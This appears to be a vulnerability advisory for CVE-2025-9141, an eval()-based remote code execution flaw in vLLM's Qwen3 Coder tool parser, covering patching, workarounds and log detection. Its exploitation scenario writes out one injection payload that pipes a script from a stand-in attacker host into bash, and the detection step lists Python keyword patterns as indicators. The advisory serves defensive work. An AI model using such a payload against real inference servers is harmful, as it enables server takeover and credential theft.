If you run vLLM >=0.10.0 with Qwen3 Coder and tool calling enabled, any authenticated API user can execute arbitrary code on your inference server — patch to 0.10.1.1 immediately. As an immediate workaround, remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, making post-exploitation blast radius severe.
Risk Assessment
High severity (CVSS 8.8). Exploitability is high: network-accessible, low complexity, requires only standard API authentication with no elevated privileges or user interaction needed. LLM inference servers commonly hold API keys, model weights, and internal network access. vLLM is a widely-deployed inference backbone across enterprise and cloud AI stacks, broadening exposure significantly.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| vllm | pip | >= 0.10.0, < 0.10.1.1 | 0.10.1.1 |
Do you use vllm? You're affected.
Severity & Risk
Attack Surface
Recommended Action
5 steps-
PATCH
Upgrade vllm to >=0.10.1.1 immediately on all inference nodes.
-
WORKAROUND (if patching is delayed): Remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services.
-
NETWORK
Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting.
-
DETECT
Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators.
-
VERIFY
Audit all running vLLM versions with 'pip show vllm' across inference nodes.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-9141?
If you run vLLM >=0.10.0 with Qwen3 Coder and tool calling enabled, any authenticated API user can execute arbitrary code on your inference server — patch to 0.10.1.1 immediately. As an immediate workaround, remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, making post-exploitation blast radius severe.
Is CVE-2025-9141 actively exploited?
No confirmed active exploitation of CVE-2025-9141 has been reported, but organizations should still patch proactively.
How to fix CVE-2025-9141?
1. PATCH: Upgrade vllm to >=0.10.1.1 immediately on all inference nodes. 2. WORKAROUND (if patching is delayed): Remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services. 3. NETWORK: Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting. 4. DETECT: Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators. 5. VERIFY: Audit all running vLLM versions with 'pip show vllm' across inference nodes.
What systems are affected by CVE-2025-9141?
This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, agent frameworks, tool-enabled LLM pipelines, agentic AI platforms, multi-tenant AI API services.
What is the CVSS score for CVE-2025-9141?
CVE-2025-9141 has a CVSS v3.1 base score of 8.8 (HIGH).
Technical Details
NVD Description
### Summary An unsafe deserialization vulnerability allows any authenticated user to execute arbitrary code on the server if they are able to get the model to pass the code as an argument to a tool call. ### Details vLLM's [Qwen3 Coder tool parser](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/tool_parsers/qwen3coder_tool_parser.py) contains a code execution path that uses Python's `eval()` function to parse tool call parameters. This occurs during the parameter conversion process when the parser attempts to handle unknown data types. This code path is reached when: 1. Tool calling is enabled (`--enable-auto-tool-choice`) 2. The qwen3_coder parser is specified (`--tool-call-parser qwen3_coder`) 3. The parameter type is not explicitly defined or recognized ### Impact Remote Code Execution via Python's `eval()` function.
Exploitation Scenario
An adversary with valid but low-privileged API credentials (stolen service account, malicious insider, or compromised client in a multi-tenant deployment) sends a crafted tool call request to a vLLM endpoint running Qwen3 Coder. The tool call includes a parameter with an unrecognized or ambiguous type, triggering the parser's eval() fallback path. The adversary injects a payload such as __import__('os').system('curl attacker.com/shell.sh | bash') as the parameter value. This executes on the inference server under the process owner's privileges, enabling credential theft, internal network pivoting, model weight exfiltration, or persistent backdoor installation.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2024-9053 9.8 vllm: RCE via unsafe pickle deserialization in RPC server
Same package: vllm CVE-2026-25960 9.8 vllm: SSRF allows internal network access
Same package: vllm CVE-2025-47277 9.8 vLLM: RCE via exposed TCPStore in distributed inference
Same package: vllm CVE-2024-11041 9.8 vllm: RCE via unsafe pickle deserialization in MessageQueue
Same package: vllm CVE-2025-32444 9.8 vLLM: RCE via pickle deserialization on ZeroMQ
Same package: vllm
AI Threat Alert